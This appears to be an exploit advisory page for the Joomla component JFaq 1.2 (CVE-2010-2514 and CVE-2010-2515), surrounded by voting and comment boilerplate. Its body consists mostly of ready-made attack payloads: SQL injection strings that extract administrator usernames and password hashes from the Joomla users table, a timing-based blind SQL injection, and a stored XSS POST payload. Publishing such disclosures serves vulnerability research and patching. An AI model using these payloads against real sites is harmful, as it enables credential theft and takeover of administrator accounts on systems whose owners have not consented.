Joomla Component JFaq 1.2 Multiple Vulnerabilities

2010.07.01

Credit: jdc

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2010-2514 | CVE-2010-2515

CWE: CWE-79
CWE-89

# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where 
gid=25 limit 1), 1, 1, 1, 1, 1) -- '


id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 -- '


id Blind SQL injection
----------------------
requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '


Persistent XSS
--------------
requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"

NOTE: cannot be manually input - editor script strips exploit

References:

http://www.securityfocus.com/bid/41029

http://secunia.com/advisories/40219

http://packetstormsecurity.org/1006-exploits/joomlajfaq-sqlxss.txt

http://osvdb.org/65695

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component JFaq 1.2 Multiple Vulnerabilities

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.